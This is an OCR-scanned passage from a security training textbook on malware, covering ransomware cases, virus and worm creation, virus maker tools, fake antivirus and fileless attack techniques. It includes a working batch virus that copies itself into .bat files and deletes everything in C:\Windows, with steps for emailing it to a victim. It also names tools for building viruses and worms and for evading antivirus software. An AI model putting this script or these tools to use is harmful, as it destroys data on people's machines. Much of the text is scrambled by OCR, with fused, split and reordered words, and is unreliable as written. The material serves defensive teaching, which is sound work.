Examples
of Ransomware
©
Dharma
Dharmais a dreadful ransomware that was first identified in 2016;s ince then,it has
beenaffecting
various targets across the globewith new versions. It hasbeenregularly
updatedwith sophisticated mechanisms in recent years.At the end of March 2019,
Dharmastrucka parking lot systemi n Canada.Previously, it also infected a Texas
hospital
andsome otherorganizations.
Thevariants of this ransomware havethe
following
extension: .adobe,.bip,.combo,.cezar, .ETH,
.java. Its encrypted
fileshave
suchas .xxxxx and.like,Thisransomware employs
new extensions, an AESencryption
algorithm
to encrypt data and then displaysransom notes. Theseransom notes are
namedas eitherInfo.htaor FILESENCRYPTED.txt. Thisransomware carries out through
email campaigns.
The ransom notes ask victims to contact the threat actors via the
provided andpayi n bitcoinsfor the decryption
emailaddress service.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 All your fileshavebeenencrypted!

=
Figure
eChoraix
displaying
7.50:Screenshot ransom demand ofDharma
message ransamware

eChOraix is a new ransomware that specifically targetsLinux deviceswith QNAP

network-attached storage(NAS). It infectsand encrypts the victim’s
machineusingthe
AESencryption technique. Thismalwarewas developed usingthe Go programming
language, and it hasa very limitednumberof code lines, i.e., 400,Oncethe malware
infects the system,it communicates with its malicious C2C server via Tor
networks/SOCKSS proxyservers andthen initiates the encryption process.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Status:Waiting
Payment.

your
If youwant decrypting filessend 0.055 @ _BTC(bitcoin)
totthis
address: Ea
1LWaqmP4oT]WS3ShtHWm1UjnvaLxtMrakim
Or use QRcode

Check paymentandget decryptor

751:Screenshotdisplaying
Figure d emand
ransom ofechorairansomware
message
SamSam
‘SamSam
a
is notorious ransomware thatinfected
It was firstdiscoveredi n 2016; however,
millionsof unpatched
it was considered
servers i n 2018
as a grave ransomware after
theWannaCry
asymmetric
systems.
due
tovast
attack
encryption
its
technique
victim basei n 2018,SamSam
to encrypt the acquired the
employsRSA-2048
localfiles i n the infected
Unlikeotherransomware, thisransomware doesnot attackvictims randomly.
Thisis a targetedransomware,whichspecifically
targetscertain reputed In
companies.
spiteof
knowing
this, Nearly
largemulti-nationalcompanies
fromsuchattacks.Theattacktechnique
fromthat employed byother ransomware.
employed to
were unable defendthemselves
bythisransomware is alsodifferent
all ransomware uses spam emailsto
propagateand perform attacks;however, SamSam employs brute-forcetacticsagainst
weak passwordsof the Remote Desktop Protocol(RDP).

07
Module 935
Page tical andCountermensores
Making by Comet
Copyright©
 Screenshot
Figure752:
displaying
ransom
Someadditionalr ansomware are as
message
SamSam
ransomeare
follows:
demand of

+
WannaCry
+
Petya-NotPetya
+
Gandcrab
MegaCortex
LockerGoga
NamPoHyu
Ryuk
Cryptghost

Module0 7Page
936 ti l andCountermeasures
Macking
©
Copyightby E-Comell
 Howto InfectSystems a Virus:Creating
Using a Virus

‘virus
in
can becreated two differentway

ae
EXER
(¢-Weting
avis|| Program OQ

|
a Virus (Cont'd)€
Howto InfectSystems a Virus: Creating
Using \EH
@Using
Virus
Maker
Tools Baker
JPsVirws

Tools
‘Virus
Maker

How to Infect Systems Usinga Virus

Attackers usinga virus in the following
can infectsystems steps:
Creating Virus
=
andDeploying
Propagating Virus

Module
7 927
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Creating
a Virus

Avirus can becreatedi n two ways:writing andusingvirus makertools.

a virus program,
=

a
WritingSimpleVirus
Thefollowing
Program
stepsare involvedi n writinga simple
virus program:
1.
Create Game.bat
with
following
text:
a batchfile the

echo
@
off
delin +
%9%f
for (*.bat)
docopy%%f Game.
bat
c:\Windows\*.*
ConverttheGame.batbatchfile into Game.com
usingthe bat2com
utility,
SendtheGame.com
file as an emailattachmentto the victim
‘When
Game.com is executedbythe victim,it copies itselfto all the .batfilesi n the
on the targetmachine
current directory and deletesall the filesi n the Windows
directory
Virus MakerTools
Using
Virusmakertoolsallowyou to customize andcraftyour virus into a single
executable
file. The
‘Once
nature
depends
onoptions
of thevirus
available
the
following
maker
tool,
the virus file is built andexecuted,
it can
i n the virus

perform
the tasks:
Disable
Windows command
promptand Windows
TaskManager
©. Shutdownthe system
©
executable
Infectaall
files
©

InjectitselfWindows
into the
Performnon-malicious
start keyboard
registryand up with Windows
activitysuchas unusualmouse and actions
The following
toolsare usefulfortestingthesecurityofyour own antivirus software.
© DELmE’s

DELmE’s
Batch
VirusMaker
BatchVirusGeneratoris a virus creation programwith manyoptionsto
infectthevictim'sPC,
diskdrive,disabling
killing
suchas
the
formatting
adminprivileges,
disabling/removing
tasks,
and
deleting
C: drive,
cleaning
allthe filesi n the hard
changing
the registry,
the antivirus andfirewall
the homepage,

ical andCountermensores
Mackin ©by E-Comel
Copyright
© IPS
Virus Maker
JPSVirus Maker tool used to create customizedviruses. It has many in-built
is

to
‘options Some of the features
create a virus,
task manager,disablecontrol panel,
Defender,
etc
of
this
tool are auto-startup,
enable remote desktop,
disable
turn off Windows

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PS
(Virus
Maker
4.0) Tx]

Seale
Internet
EckerMouze
—
Button Sap
ast
Gus Felder
Options
Paley

and
Remove
Leck
Mouse eybord
‘Aways
pen CDROM
Of Tun Mentor

Eo Figure7.54: of5 VirusMaker

Working
Someadditionalvirus makertoolsare as follows:
Bhavesh
Deadly
Virus
Maker
SKW
Virus Maker
=
SonicBatBatch
Virus Maker

TeraBIT
VirusMaker
Andreinick0S's
BatchVirusMaker

ical
Mackin
and Copyright
©
by
E-Come
Countermensores
 How to Infect Systems a Virus:Propagating
Using and
Deploying a Virus
‘Virus
Hoaxes ‘Google
Critical Security
Alert Scam

(©
Hoavesreports
are fle alarms
claiming

emaim essage
should
not be

and
so
wll
certain
viewed doing damageone's

How to Infect SystemsUsinga Virus:Propagating

and
Deploying a Virus (Cont'd)
FakeAntivirus FreeAntivirus 2019,

|G Aweltcesigned,
‘heir
fae antivirus loks
andoftenencourages
users to instal
perform
systems, updates,
authentic
eon
or remove

damage ite othermale

targetsystems

FakeAntivirus Programs

Propagating
and Deploying
a Virus

After creatingviruses, attackerscan adoptvarious virus and deployment

propagation
techniques
to transferthe virus machine.Some of these techniqui
to the victim’s
follows:
Virus Hoaxes
=
FakeAntivirus

»yeo-Goune
VirusHoaxes
Techniques
suchas virus hoaxesandfake antivirus softwareare widely
usedbyattackersto
introduceviruses into victims’
systems.
Virus hoaxesc an be nearly as harmfula s realviruses in terms of lossof productivityand
bandwidthwhile naive users react to themandforwardthemto other users. Because viruses
fear,theyhavebecomea common subject
tend to create considerable ofhoaxes.
Virushoaxes
are falsealarms

Thefollowing
claiming
nonexistent
viruses.
reportsof
are some criticalfeaturesof virus hoaxes:
‘=

warning
These
messagemessages, propagated,
rapidly
shouldnot beopened, that e-mail
whichcan be
andthat doing
state
s o woulddamage
a particular
one’s
system.
+
_Insome
cases,thesewarning messagesthemselves contain virus attachments
to crosscheck
‘Try
It is a
the
good
of
identity posted
the personwhohas the warning,
practice to look for technicaldetailsi n any messageconcerningviruses.
searchfor informationon the Internetto learnmore about hoaxes,
Furthermore, especially
by
scanning bulletin boards on which peopleactively discusscurrent community
happenings/concerns. Internet information,
byreading
Beforejumping to conclusions first,

If
the
check following:
the informationi s posted by newsgroupsthat are suspicious,cross-check
the
informationwith anothersource.
If the personwho hasposted
the news is not an expertor a known personi n the
community, crosscheck
the informationwith another
source.

bodyhasposted
If a government the news,the posting
shouldalsohavea referenceto
federal
the correspondingregulation.
Oneof the most effective checks
i s to look up the suspected
hoax virus byname on
antivirus softwarevendorsites.
Google
CriticalSecurity
Alert Scam:
In 2018,a massivehoaxcampaignw as launched, threat actors spread
i n which Google Critical
Security
Alert messagesto victims. GoogleCriticalSecurityAlert is a service provided
byGoogle
to notifyi ts users regarding relatedto their accounts.The activities can include
any activity
logging
in, changing passwords,
changingpersonal information,etc. Attackerscreate andsend
fake alert emailsto victims,thereby notifyingthem that the aforementionedactivities have
takenplace. Bylooking at the criticalalert email,the user clicksthe link provided
in the email
and subsequently getsinfected.Thefigure belowdescribes a hoaxemailstating “New device
signed in to.―Bylooking at this emailwithout notingthe emailsource, the victim clicksthe
“CHECKACTIVITY―buttonandgets trapped.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Newdevicesigned
in to

CCHECKACTIVITY

itl
Figure7.5:Srenshotof Goole
Someadditionalvirus hoaxesare as follows:
Secu Seam
Alert

+
AppleCare
+

+
Chrome
8.5 Video
BangkokEarthquake
critical
error
+

FakeAntiVirus
video
Compromising

Fakeor rogue antivirus softwareis a formof Internetfraudbasedon malware.It appears and

performs
similarly is oftendisplayed
to a realantivirus program.Fakeantivirus software in
banner ads,pop-ups, email links,and searchengine resultswhen searching for antivirus
software.A well-designed fake antivirus softwarelooksauthenticandoften encourages users
perform
to installi t on their systems, updates, or remove viruses andothermalicious
programs.
Uponclicking the ad,pop-up, or link to installthe antivirus software,
users are redirectedto
another pagewhere theyare prompted to buyor subscribe to that antivirus softwareby
enteringtheir payment details.Fakeantivirus softwarecan cause severe damage to systems
once downloaded and installed; e.g., theyinfectsystems with malicious software,steal
sensitive information(e.g.,passwords, bank account numbers, creditcarddata), and corrupt

ical andCountermensores
Mackin ©by E-Comel
Copyright
At present,a new fake antivirus trend has emerged. Fake antivirus tools are rapidly
proliferating the mobileapplication
space.According
to AV-Comparatives research,two-thirds
ofall antivirus applications in theAndroidPlay
present Storeare fake.
Free Antivirus2019
FreeAntivirus2019is a fake Androidantivirus application.
It is intendedto eliminate
viruses andothermalwarefrommobile devices. whenit is scanned
However, byitself,it
a
is indicatedas MediumRisk, as showni n thescreenshot
below,

756: ScreenshotofAntivius
Figure Pro2017FakeAnivieus

Someadditional
fakeantivirus programsare asfollows:
=

=
AntiVirus
Pro
2017
PCSecureSystem
Antivirus
Totalav
10

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Computer Worms

ae
©computerworms
‘that
mals programs
execute, are
ow is a Worm Diff

network
connections,
independent
replicate,

‘hs
available
computing
resources
spread the
aeross
consuming

‘tacks
payloads
to
install ia
backdoors
use worm
‘Aworm speci
replat elf anduse
cae
typeof malware
that an
memorybut cant tach

Worm
Spreads
tombiesadcreates botnet thesebotnetscan
besedt o perform furthere ye attacks (©
A through
the infected
Network

‘Worm:
‘A worm advantage
takes offileor information

© Bondat

Computer
Worms
Computer
worms are standalone maliciousprograms that replicate, andspread
execute, across
networkconnections independentlywithouthumanintervention.Intruders design most worms
to replicate
andspread acrossa network,thusconsuming resourcesand,i n
availablecomputing
turn, causingnetworkservers, web servers, and individual computersystems to become
overloadedand stopresponding. However, some worms alsocarrya payload to damage the
hostsystem,
ofviruses. A worm doesnot requirea hostto replicate;
are a subtype
‘Worms however, i n some
hostmachineis alsoinfected.Initially,
cases,theworm’s blackhat professionalstreatedworms
as a mainframe problem.
Later,withthe introduction ofthe Internet,theymainly focused on
andtargeted WindowsOSusing the same worms bysharing themi n via e-mail,IRC,andother
networkfunctions.
use worm payloads
Attackers to install backdoors
on infected whichturns them
computers,
into zombiesandcreates a botnet.Attackersuse thesebotnetsto initiate cyber-attacks.
Some
ofthelatestcomputer
worms are asfollows:
=
Monero
=
Bondat
=
Beapy

ical andCountermensores
Mackin ©by E-Comel
Copyright
Howisa WormDifferent
froma Virus?
Virus Worm
‘virusinfectsa system byinsertingitself A worm infectsa systembyexploitinga vulnerability
into a file or executableprogram In an 0S or application
byreplicating
itself
deleteor alterthecontent offilesor
It might a worm doesnot modify
Typically, any stored
changethelocationoffilesi n thesystem programs;it only the CPUandmemory
exploits
a
Italters theway computer system
withoutthe knowledge
‘operates
of auser
It consumes networkbandwidth,
or consent etc,, excessively
systems
overloading
system memory,
servers and computer

‘viruscannot spread to othercomputers ‘Aworm can replicate itselfandspread usingIRC,

Unless an infected andsent Outlook,
file is replicated or otherapplicable mailing programsafter
to theother computers installation i n a system

spreads
‘Avirus at a uniform rate,as worm spreads more rapidlythana virus
programmed
Virusesare difficult to remove from infected Comparedwith a virus, a worm can beremoved
machines easily
froma system
74: Otlerence
‘Table between
vis
and
worm

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WormMakers

Internet WormMaker Thing

ves,
thatcan infectiti’
software
les,

Thistool
withby
batch
anvu
comes

into
a compiler
executable
to evade

WormMakers

WormMakers
Worm makersare toolsthat are usedto create and customize computer worms to perform
malicious spread
tasks.Theseworms, once created, independently over networks
andpoison
entire networks.With the helpof pre-defined
optionsi n the worm makers,a worm can be
designed
according
to thetask it is intendedto execute.
=
InternetWormMakerThing
InternetWormMakerThing tool usedto create worms that can infect
i s an open-source
a victim'sdrivesand files,showmessages, disableantivirus software, etc. Thistool
comes with 2 compiler that can easilyconvert your batchvirus into an executableto

or
evadeantivirus software for any other purpose.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
7.57.
Someworm makersa re as follows:
ofInternet WormMaker
Sereenshot Thing

=
BatchWormGenerator
=
CH WormGenerator

Module
07 948
Page tical andCountermensores
Making by Comet
Copyright©
 ModuleFlow

‘Malware
Concepts FilolessMalwareConcepts

MalwareAnalysis

‘Trojan
Concepts Countermeasures

Virus and
Worm
Concepts Anti-MalwareSoftware

Malware Concepts
Nowadays,
filelessmalwareis becoming methodof attackbycyber-criminals
a popular because
of the inconspicuouscharacteristics of suchmalwareas well as its ability to evadecommon
security controls.As filelessmalware evadevarious security
c an easily controls, organizations
need to focuson monitoring, detecting, and preventing
maliciousactivities insteadof using
traditionalapproaches suchas scanningfor malwarethrough file signatures. Thissection
discusses various concepts relatedto filelessmalware,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is FilelessMalware?

also
pae
existing
to infects
erfor
Fillesmalar,
legtimate
nthester
Ieleverags
software,
other
known

anyexisting
protocols
vais

vulnerabilities
non-malware,
malicious act

to infecthesatem
appiatons,and

Iecesids in RAM.l t injects

thesystems malicious
codeint theunningprcesees such
at Microsoft
Word,
Flash,
Adobe
POFRess,Javascrist andPowershall

‘Reasons
for
in fileless Fileless
using
eybor
attacks: Propagation
byTechniques
malware
‘used
attackers

LUvingotttheland
Uses
Trustworthy
deft
Gots

tools
thatstem
ooltexte
used sppliestons
Mamarycade
Infection
re

eral
frequently trout
——@ ction
@ Sript.bsedinecton

Whatis Fileless Malware?

Filelessmalware, alsocallednon-malware, infectslegitimate
software, applications,
andother
protocols existingi n the systemto perform various maliciousactivities.Thistypeof malware
leverages vulnerabilitiesto infectthe system.
existing It generally
residesi n the system’s
RAM
It injectsmalicious codeinto runningprocesses suchas Microsoft Word,Flash, AdobePDF
Reader,Javascript, PowerShell, .NET, malicious Macros,and Windows Management
Instrumentation (WMI).
Filelessmalwaredoesnot depend on filesandleavesno traces,thereby making it difficultto
detectand remove using traditionalanti-malwaresolutions.Therefore, suchmalwareis highly
resistantto computer forensics
techniques.It mostlyresidesi n volatilememorylocations such
as running processes,system
to the target
persistence,
and
registry,
system,it can exploit
escalateprivileges,
service
areas.
fileless
Oncethe
gains
access malware
systemadministrationtools and processes
and move laterally
to maintain
across the targetnetwork.Attackersuse
suchmalwareto stealcriticaldatafrom the system,installother types of malware, or inject
‘malicious that automatically
scripts execute with everysystem restart to continue theattack.
Thevarious reasons for using filelessmalwarei n cyber-attacks
are as follows

malwareexploits
‘Stealth:Fileless legitimate tools;hence,
system itis extremely
difficult
block,
to detect, filelessattacks.
or prevent
LOL (Living-off-the-land):Systemtools exploitedby filelessmalwareare already
installedi n the systembydefault. An attackerdoes not need to create and install
custom toolson the targetsystem.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘=
Trustworthy: toolsusedbyfilelessmalwareare the most frequently
The system used
andtrustedtools;hence, tools incorrectly
security assume that suchtools are running
fora legitimate
purpose.
FilelessTechniquesusedbyAttackers
=
Phishingemails:Attackersuse phishing emailsembeddedwith maliciouslinks or
downloads,
Legitimate
which,
when
clicked,
applications:
malicious
Attackers
the memory.
injectandrun
exploitlegitimate
codei n victim's
installedin the
systempackages
system,suchas Word,andJavaScript,
to run the malware.
Native applications:
Operatingsystems suchas Windowsinclude pre-installed
tools
suchas PowerShell,WindowsManagement Instrumentation(WM).
Attackersexploit
thesetoolsto
install
Infectionthrough
andrun maliciouscode.
lateralmovement: Oncethe filelessmalwareinfectsthe target
system,attackersuse this systemto move laterally i n the networkand infect other
systems connectedto thenetwork.
Malicious websites: Attackerscreate fraudulent
websites that appearlegitimate.
When
a victim visits such a website, it automatically
scans the victim’ssystemto detect
vulnerabilitiesi n pluginsthat can be exploited
bytheattackersto run malicious codei n
the browser'smemory.
Registry
manipulation:
Attackersuse this technique and run maliciouscode
to inject
fromthe Windowsregistrythrough
directly a legitimate
systemprocess.Thishelps
attackersto bypass UAC,application whitelisting, etc., and alsoinfectother running
processes.
Memorycode injection: Attackersuse this technique to injectmaliciouscodeand
maintain persistence i n the process memory of the runningprocesswith the ai m of
propagating and re-injecting it into other legitimate systemprocesses that are critical
for normalsystemoperation.This helps i n bypassing regular securitycontrols.The
various code injection techniques used byattackersincludelocalshellcodeinjection,
remote threadinjection, process hallowing, etc.

Script-based injection:Attackers oftenuse scriptsi n whichthebinaries or shellcode are

obfuscatedand
encoded. might fileless.
Suchscript-based
scriptsare oftenembeddedi n documents
attacks not becompletely
as emailattachments.
The

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of FilelessMalwareThreats
Taxonomy
Type

Exploit
Type!

of FilelessMalware Threats
‘Taxonomy
Source:https://docs.microsoft.com
shown i n the figure
‘As below,
filelessmalwarethreatsare dividedinto differentcategories:
Type
lt

Exploit
‘ Execution/Injec
Typelt
2 Taxonomy
some
(ek but Mes

\ —
& offileless
sera threats:

Hardware
ofa lelss malware
7.5: Taxonomy
Figure threats

Modul
7 952
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Fileless
malware c an becategorized
based o n their pointofentry,ie., howthe malwarecreates
an entrypointinto the targetsystem.Filelessmalwareenters the targetsystemthrough an

or
exploit compromised
According
hardwareor bythenormal
to the abovecategorization,
or
execution ofapplications scripts.
filelessmalwarethreatsare of three typesbasedon
they
howmuchevidence leaveon the victim'smachine:

1:No
Type FileActivity
Thistypeof malware
Performed
never requireswritinga fileonto the disk.An example of suchan
infectionis receivingmaliciouspackets that exploita vulnerability hostthat
i n a target
automatically installsa backdoorin thekernelmemory.Another example mayinvolve
maliciouscodeembeddedwithin the compromised device'sfirmware,Anti-malware
solutions of checking
a re not capable a device's
firmware, itis extremely
Hence, difficult
to detectandprevent suchthreats.

2:
Type IndirectFileActivity
Thistypeof malwareachieves filelesspresenceon the targetmachine
usingfiles.For
example,an attacker can injecta maliciousPowerShellcommandinto the WMI
to configure
repository a filter that executes periodically.

3:
Type Required
Filesto Operate
Thistypeof malwarerequiresfilesto operate,but it does not execute attacksfrom
thosefiles directly.
For example, an attackerexploitsa documentwith an embedded
macro, Java/Flashfile,or EXEfileto injectmalicious into the targethostand
payloads
then maintains persistencewithout usingany files.

=
of
Classification
filelessmalware
Exploits
threatsbased
o n theirpointofentry:

Exploitscan be either file-basedor network-based. File-basedmalwareexploits the

systemexecutables, Flash, Java,documents,etc., to run a shelicodethat injectsa
maliciouspayload into the memory.Thistypeof malwareuses files to makean initial
entry into the targetmachine.Network-basedmalwareexploits vulnerabilitiesi n
networkcommunication protocols suchas SMBto delivermaliciouspayloads.
Hardware
Device-based malwareinfectsthe firmwareresiding o n networkcardsandharddisksto
deliver the malicious payload. CPU-basedmalware exploits firmwareusedfor
management to execute malicious
operations codewithinthe CPU.USB-based malware
rewrites theUSBfirmware withmalicious codethatdirectlyinteractswith the operating
systemandinstallsmaliciouspayload on the targetmachine. Similarly,
filelessmalware
can alsoexploitBIOS-based firmwareor perform hypervisor-based attacksthat exploit
virtualmachines

ical andCountermensores
Mackin ©by E-Comel
Copyright
ExecutionandInjection
Thistypeof malwarecan be file-based, macro-based, script-based, or disk-based,File-
basedmalwareexploits executables, DLLS,LNK,files,etc.,to injecta maliciouspayload
into the processmemoryor other legitimate runningprocesses. Using macro-based
malware, attackerstrick victims into clickingmaliciouslinks that execute macros
automatically to injecta maliciouspayload into the processmemory.Attackers
implement script-basedmalwareif theygain a n initial footprint
on the target system.
Theattackerinjectsmaliciouspayload byrunninga malicious scripto n the command
prompt.Disk-based malwarerewrites the bootrecordwith malicious code, which,when
executed,
access
gains
andthe installs maliciouspayload.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HowdoesFilelessMalwareWork?

Pointot Entry Code

Execution
Anering

How doesFileless Malware Work?

Afilelessmalwareattackgenerally as showni n the figure
consistsof severalstages, below:

Pointo f Eatry

ae
Persistence Achieviog
Objectives

Le

=
Pointof Entry
© MemoryExploits:
fileless malwareuses a varietyof techniques
to injectand
the processmemoryof a legitimate
itself i n
‘execute systemprocess.It exploits
the
memoryand privileges
of whitelistedsystemtoolssuchas WindowsManagement
Instrumentation (WMI),
PowerShell,
Command.exe,
PsExec,
etc.

Modul
7Page 955
tical
Making
and by
CountermensoresCopyright©
Comet
 Malicious Website: Filelessthreatsmay alsoarrive fromexploit-hostingwebsites
that appear to be legitimate businesspages.Whenthe user visits the page, the
exploitkit starts scanningfor vulnerabilities,suchas any outdatedFlashor Java
plugins. If successful,it invokesWindowsnative tools such as PowerShellto
download andexecute the payload
to the disk,
i n the memorywithoutwriting
directly
any
files

Filelessmalwarecan alsoexploit
script-basedprogramssuchas PowerShell,Macros,
andVBScript.
JavaScript, Theinitialscriptmightbe usedfor code injectionor to
connect to other malicioussites to downloadmore binaries/scripts
to deliverthe
actualpayload.
Phishing Email/Malicious Documents: Attackerscan alsoembedmaliciousmacros
in the form of VBScript or JavaScript i n a MicrosoftOfficedocument(Word,
PowerPoint, Excel)or PDF, and furtheruse socialengineeringtechniques to get
users to run the macros on their systems.Here,the attackinitiates with a document
or file but transforms
into a filelessthreat whenthe malicious
scripti s executed
from memory usingwhitelistedtoolssuchas PowerShell,
CodeExecution
© CodeInjection:Fileless
threatscan use various code injectiontechniquessuchas
processhollowing
andreflectiveDLLinjection, whichdirectly
loadthe shellcodeinto
the memorywithoutwriting
Script-based
any
file
Fileless
Injection:
todisk,
the
malwareoften comes embeddedin a document as
an emailattachment.Once the documentis opened, the maliciousscriptruns i n the
memory,thusturninginto a filelessoperation. Thescripttheninvokes whitelisted
applications,suchas PowerShell,mshta.exe, JavaScript,
WScript,and VBscript, to
connect to one or more malicious
websitesto download additionalscriptsto deliver
the actualpayload.All theseoperations
occur i n memory, whichmakes it difficultfor
traditional
anti-malware
solutions
to detectthem.
Persistence
In general,
filelessmalwareis not persistenti n nature. As it is memory-based,
restarting
the systemwould remove the maliciouscodefrom memoryand stopthe infection.
However,depending on the goalof the attacker, maliciousscriptsc an be storedi n
various Windowsbuilt-in tools and utilities such as Windowsregistry, WMI,and
WindowsTaskScheduler, andbe setto run even after a system reboot.
© WindowsRegistry: Attackerscan store the maliciousscriptsi n the Windows
keys
AutoStartregistry so thattheya re loaded
andexecutedwhenever the machine
is restarted.

‘Windows
Management Instrumentation(WMI); FilelessmalwarealsoabusesWMI,
whichis commonly usedforautomating system administrationtasks,to achieve and
In this case,attackersstore the maliciousscripts
maintain persistence. i n the WMI
thatare periodically
repositories triggered
via WMI bindings.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Windows
TaskScheduler: a taskscheduler,
Using attackerscan set malicious
scripts
to beautomatically
triggered
andexecutedi n a chosentime interval.
Achieving
Objectives
Bymaintaining attackers
persistence, bypasssecuritysolutionsandachieve of
a variety
objectives,
suchas data exfiltration,credentialstealing,
reconnaissance,and cyber
spying,o n thetargetsystems
andnetwork,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FilelessMalware through
Launching DocumentExploits
and
In-Memory
Exploits
DocumentExplo In-Memory
Explotts

oa
ON
Memory
oleincon
ReecveDtnieton

Fileless Malware through

Launching DocumentExploits
‘An documents,
attackerc an trick users into downloading archives,PDFs,
or otherattractive files,
of maliciousmacro code,
consisting whichare sent via phishingemailsor accepted via social
engineeringtricks.Oncethe file is opened, the maliciousmacro launchesVBA(VisualBasic) or
to exploit
JavaScript theWindowsdefaulttoolssuchas PowerShell. Then,the malicious script
UsesPowerShell to run additionalcode or payload without being
to continue the infection
traced
Themaliciousscriptc an eitherexploit
PowerShellto getaccessto localstorage
filesto run the
or simply
executables execute the maliciouspayloadi n memory. Oncethe maliciouscodeor
payload is successfully
insidethedocument it disguises
executed, itselfas a legitimate
dropper
or downloaderto continue the chainof infectionthat can be leveraged
byan attackerto launch
furtherattacks.
A
fileless
+
document
exploits
malware

a following
steps:
malicious
document
through
c an be launched
Thevictim is trickedinto downloading/running
in the

runs
amalicious
macro
Thedocument
‘Themaliciousmacro launches
V BAor JavaScript
Themalicious scriptexploits
PowerShell code(payload)
to run additional to spread
the
infectionto otherrunningprocesses
or systems

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Victim
opensDocument
malious rans
document
maliious
VBA
2
script
launches
run macro
Macro
or SavaScpt
Macious exploits
Powershalltopayload
7.60;Launching
Figure Malwarethough
F ileless DocumentExploits

‘Launching
Fileless Malware throughIn-Memory
Exploits
Attackerscan injectmaliciouspayload insidethe running memory (RAM) that targetslegitimate
processes withoutleavinganyfootprints. Suchintrusion is extremely difficultto bedetected by
any antivirus software,
as the payload is not storedi n localdisksbut is directly executedfrom
memory. Attackersexploit differentAPIs or Windowsadmin tools such as Windows
Management Instrumentation (WMI), PSExec, and PowerShellto gain access to the process
memoryof a legitimate process.Attackersemploy a reflective Dynamic Link Library(DLL)
methodto loada maliciousscriptinto a host-sideprocess that resiststhe writingof DLLsto the
disk,
is a typeof in-memoryexploit
EternalBlue that can leverage
the flawsi n the Windows
file
sharing
protocol
knownas ServerMessage Block(SMB 4).Thisclient-servercommunication
protocol(SMB 1)allowsan attackerto readaccessservices,applications etc. Theattackerthen
targetsthe localsecurityauthoritysubsystemservice (Isass.exe) file,injectingmaliciouscode.
Thefile (Isass.exe)is designed
to handlelogin-logout validating user credentials,and it also
performs Theattackerexploits
othercriticaloperations. ths file to launchfurtherattackswhile
evading usingtoolssuchas Mimikatzto access the detailsfrommemory.
security
Exploit
Insmemory
EtemalBlue "> SMBL

injection
‘Memory
Invoke -ReflectiveDIlinjection

Suspicious
activity -7 Cleartext
Passwords

Mimikate > LSASS.EXE

“password
Hashes

Figure payloads
761: Delvering i n-memoryexpats
using

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FilelessMalwarethrough
Launching Script-based
Injection
(©Fleesattacksae
obfuscated, also
performed
avoid
fileonthe
andcompiled to
wing the scrints where
eeations ok
b inaries
ands heleades
are embedded

(©
or andinfecttheapplications
Seip allowattackersto communiate
troced
operating without Being
systems

Fileless Malware through

Launching Script-based
Injection
Filelessattacksare alsoperformed
using scriptswhereby binariesandshellcodeare embedded,
obfuscated, and compiled to avoid file creation on the disk.Scriptsallow attackersto
communicatewith andinfectapplications or operatingsystemswithout beingtraced.Theya re
alsousefuli n finding
design
flawsandvulnerabilities i n the applications. are usually
Scripts
flexible,and theycan be executedfrom any files or directly from memory.The attacker
leverages
this feature along
with the vulnerabilitiesi n a system to injectmaliciousscripts
directly into the memoryvia PowerShell to evadedetection.Oncethe attackergainscontrolof
the targetsystem, he/shecan execute thesescripts directly
o n a command-line interfacefroma
remote locationto spread infectionsand initiate other maliciousactivities. Manyclassical
filelessthreatssuchas KOVET, POWMET, and FAREIThaveusedmaliciousscriptsto spread
malware.

a
Â¥
Loaderconshiting
manus set es,
‘coast ote
Embeddedcode
$9 il
Placed
in
recess
mo
fond
y

>)
3
Downloeded
code
~ ~
rates
directly he ode
trom memory

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Launching
Fileless Malware byExploiting
System
Admin Tools

(©Atachersexpo
(© default
tools a dmin
system
Aacherswe Certtl andWindows
such
Management
a Cert, WMI andRegavr32

interface
Command lunch
to
infections
flees
(WMI) utestaste! infrmation
(©They
and
commande teks such
explot a5 Regsw32, rundal2to run maiious DLS

El

Fileless Malware byExploiting

Launching Admin Tools
System
Theattackerexploits default systemadmintools, features, and other utilitiesof a systemto
spread filelessinfections. Attackersuse CertutilandWindowsManagement Interface Command
(WMIC) utilities to steal the information.Theyalso exploitcommand-linetools such as
Microsoftregistered server (Regsvr32)and runddl32, to run malicious DLLs.The exploited
commandlinesenablethe attackerto install altered versions of pen testingtools to gain
complete access to the target system.Themodifiedtoolsare usedto access payloads, maintain
persistence,
tools,
stealand
export
information,appear
theycan evadethe security
can exploit
andexpand
mechanism
systemtoolssuchas remote desktops,
malware.As they to beauthentic
of any traditionalantivirus software.An attacker
command-oriented toolssuchas regsvr32,
PowerShell, rundll32,certUtil,and WMIC, and pen testing toolssuchas Mimikatz, andCobalt
strike,Using this technique,attackerscan stealcriticalinformation fromthe system, suchas
credentials, to launchfurtherattacks.

763:leless
Figure
malware
by
Launching

ical
abusing tools
sysadmin

andCountermensores
Mackin ©by E-Comel
Copyright
 FilelessMalwarethrough
Launching Phishing

1@ letess
malware
expos vlnrabies in payload
toolsto loadandun malldous
system on theitn’

©

Fileless Malware through

Launching Phishing
Attackerscommonly use socialengineering techniques suchas phishing to spread fileless
malwareto the targetsystems. They sendspamemailsembedded withmaliciouslinksto the
victim. Whenthe victim clickson the link,he/shewill bedirectedto a fraudulentwebsitethat
automatically
plug-ins.
loadsFlashand
Themalwareexploits
triggersthe exploit.
Furthermore, the filelessmalware
targetsystemfor vulnerabilitiesin systemtoolssuchas PowerShell,
the identifiedvulnerability
s cansthe
WMI,and browserJava
to downloadand run the malicious
payload on the victim’s
machineand compromises the sensitive informationstored in the
processmemory. Filelessthreatscan alsomaintain persistence bycreating AutoStart registry

entries
Steps
depending on the goal
of the attacker.
followedbythe attackerto launchfilelessmalwarethrough
phishing

7.68:Launching
Figure a leless
malwarethrough
phishing
emailto the victim,embeddedwith a maliciouslink
Theattackersendsa phishing

